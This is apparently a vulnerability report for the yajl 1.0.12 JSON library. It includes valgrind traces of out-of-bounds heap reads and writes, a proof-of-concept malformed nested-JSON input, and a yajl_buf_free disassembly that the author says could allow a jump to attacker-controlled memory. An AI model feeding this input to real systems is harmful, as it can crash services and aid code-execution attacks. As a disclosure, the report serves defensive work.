Double free vulnerability in 1.0.12

[zeroinside]

==103917== Invalid read of size 4
==103917== at 0x4E3EB32: yajl_gen_array_open (in /lib/libyajl.so.1)
==103917== by 0x401900: reformat_start_array (input.c:63)
==103917== by 0x4E3CDCE: yajl_do_parse (in /lib/libyajl.so.1)
==103917== by 0x4012C0: main (input.c:149)
==103917== Address 0x540c280 is 0 bytes after a block of size 576 alloc'd
==103917== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==103917== by 0x4E3D85D: yajl_gen_alloc2 (in /lib/libyajl.so.1)
==103917== by 0x40118B: main (input.c:127)
==103917==
==103917== Invalid read of size 4
==103917== at 0x4E3DF42: yajl_gen_number (in /lib/libyajl.so.1)
==103917== by 0x401A40: reformat_number (input.c:25)
==103917== by 0x4E3CD93: yajl_do_parse (in /lib/libyajl.so.1)
==103917== by 0x4012C0: main (input.c:149)
==103917== Address 0x540c28c is 12 bytes after a block of size 576 alloc'd
==103917== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==103917== by 0x4E3D85D: yajl_gen_alloc2 (in /lib/libyajl.so.1)
==103917== by 0x40118B: main (input.c:127)
==103917==
==103917== Invalid read of size 4
==103917== at 0x4E3DFE6: yajl_gen_number (in /lib/libyajl.so.1)
==103917== by 0x401A40: reformat_number (input.c:25)
==103917== by 0x4E3CD93: yajl_do_parse (in /lib/libyajl.so.1)
==103917== by 0x4012C0: main (input.c:149)
==103917== Address 0x540c28c is 12 bytes after a block of size 576 alloc'd
==103917== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==103917== by 0x4E3D85D: yajl_gen_alloc2 (in /lib/libyajl.so.1)
==103917== by 0x40118B: main (input.c:127)
==103917==
==103917== Invalid write of size 4
==103917== at 0x4E3E090: yajl_gen_number (in /lib/libyajl.so.1)
==103917== by 0x401A40: reformat_number (input.c:25)
==103917== by 0x4E3CD93: yajl_do_parse (in /lib/libyajl.so.1)
==103917== by 0x4012C0: main (input.c:149)
==103917== Address 0x540c28c is 12 bytes after a block of size 576 alloc'd
==103917== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==103917== by 0x4E3D85D: yajl_gen_alloc2 (in /lib/libyajl.so.1)
==103917== by 0x40118B: main (input.c:127)

Here's the PoC:
{"[9[":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[4[[[[[[[[[[[[[[[[[[[[[[[[H[[[[[[[[[[K[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[{[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[E[[[[[[[[[[[[[[j[[[[[[[[[[[[[][[[[[[[[[[[[[[[[[[":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[g[@[[[[[[[[[[[[[[[[[\M[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[k[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

These one is pretty serious, if user is able to map address below the data, code can jump to it:

Dump of assembler code for function yajl_buf_free:
0x00007ffff7bd2130 <+0>: push %rbx
0x00007ffff7bd2131 <+1>: mov 0x8(%rdi),%rsi
0x00007ffff7bd2135 <+5>: mov %rdi,%rbx
0x00007ffff7bd2138 <+8>: test %rsi,%rsi
0x00007ffff7bd213b <+11>: je 0x7ffff7bd2148 <yajl_buf_free+24>
0x00007ffff7bd213d <+13>: mov 0x10(%rdi),%rax
=> 0x00007ffff7bd2141 <+17>: mov 0x18(%rax),%rdi
0x00007ffff7bd2145 <+21>: callq *0x10(%rax)
0x00007ffff7bd2148 <+24>: mov 0x10(%rbx),%rax
0x00007ffff7bd214c <+28>: mov %rbx,%rsi
0x00007ffff7bd214f <+31>: pop %rbx
0x00007ffff7bd2150 <+32>: mov 0x18(%rax),%rdi
0x00007ffff7bd2154 <+36>: mov 0x10(%rax),%rax
0x00007ffff7bd2158 <+40>: jmpq *%rax
End of assembler dump.